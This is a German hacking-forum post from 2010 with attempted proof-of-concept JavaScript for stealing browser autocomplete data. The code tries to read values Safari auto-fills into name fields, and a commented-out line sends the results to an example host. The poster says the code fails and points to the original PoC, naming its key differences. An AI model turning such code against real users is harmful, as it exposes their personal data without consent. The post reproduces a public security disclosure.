Ergebnis 1 bis 1 von 1
  1. 24.07.2010, 12:40 #1
    Ghost in the Shell
    Ghost in the Shell ist offline
    Neuling
    Registriert seit
    21.07.2010
    Beiträge
    1

    Standard Autocomplete mit JS abgreifen PoC

    Hi!

    Ihr habt ja evt. schon mitbekommen, dass einige Browser unvorsichtig mit der Autocomplete-Funktion umgehen (wenn nicht, Autocomplete: Browser verraten vertrauliche Daten | heise Security ).

    Jeremiah Grossman will seinen Proof of Concept auf der Black-Hat-Konferenz vorstellen.

    Ich dachte mir, so schwer sieht das nicht aus - versuchs selber.

    Code:
    var results = new Array();
var alphabet = new Array('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',
'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',
'1','2','3','4','5','6','7','8','9','0');
var various_form_names = new Array('first_name','firstname','vorname','name'/*,'telefon','nachname','telephone','lastname','last_name','tel','date','birth','geburtstag'*/);
function start()
{
    check_form('form_firstname',0,0); // Transferring form ids
    alert("End of operation, sending data");
    //window.location = 'http://www.example.com/index.php?data='+results; // sending results to a php-page, also possible per including a 0px-iFrame
}
function check_form(form_id,x,y)
{
    var form = document.getElementById(form_id); // getting Form-Element by id
    for (var y = 0; y < various_form_names.length; y++) // running through alphabeth, inclusive A-Z,a-z,0-9, extensions possible above
    {
        form.name = various_form_names[y];
        for (var x = 0; x < alphabet.length; x++) // running through alphabeth, inclusive A-Z,a-z,0-9, extensions possible above
        {
            form.focus();
            form.value = alphabet[x]; // writing character into form 
            //alert("Klick mich, checking "+form.name);
            if (form.value != alphabet[x]) // check, whether someting changed, maybe set a timer here
            {
                results[results.length] = form.value; // putting results into global var
                alert("Found something: "+form.value);
            }
        }
    }
}
    Das Problem: Es funktioniert nicht ^^
    Jemand eine Idee, wie ich noch exakter einen Tastendruck simulieren kann, oder was ich noch run könnte, damit es klappt? Habt ihr schon irgendwo anders einen PoC gesehen?

    Getestet mit Safari 5

    Okay, hat sich erledingt

    http://ha.ckers.org/weird/safari_autofill.html da ist der Coder veröffentlicht.

    Die wesentlichen Unterschiede sind 500 Millisekunden Wartezeit, bevor der Inhalt des Forms erneut überprüft wird und der Einsatz von event.initTextEvent.
    Geändert von Ghost in the Shell (24.07.2010 um 12:40 Uhr) Grund: Automerged Doublepost
    Zitieren Zitieren
« Vorheriges Thema | Nächstes Thema »

Ähnliche Themen

  1. [Paper] Chrome Autocomplete PWs - wie man sie ausliest
    Von Hamtaro im Forum Biete Tutorials
    Antworten: 0
    Letzter Beitrag: 27.11.2008, 14:50
  2. IE Cookies und IE Autocomplete
    Von ranosu im Forum C, C++
    Antworten: 3
    Letzter Beitrag: 25.09.2008, 15:39

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  

Foren-Regeln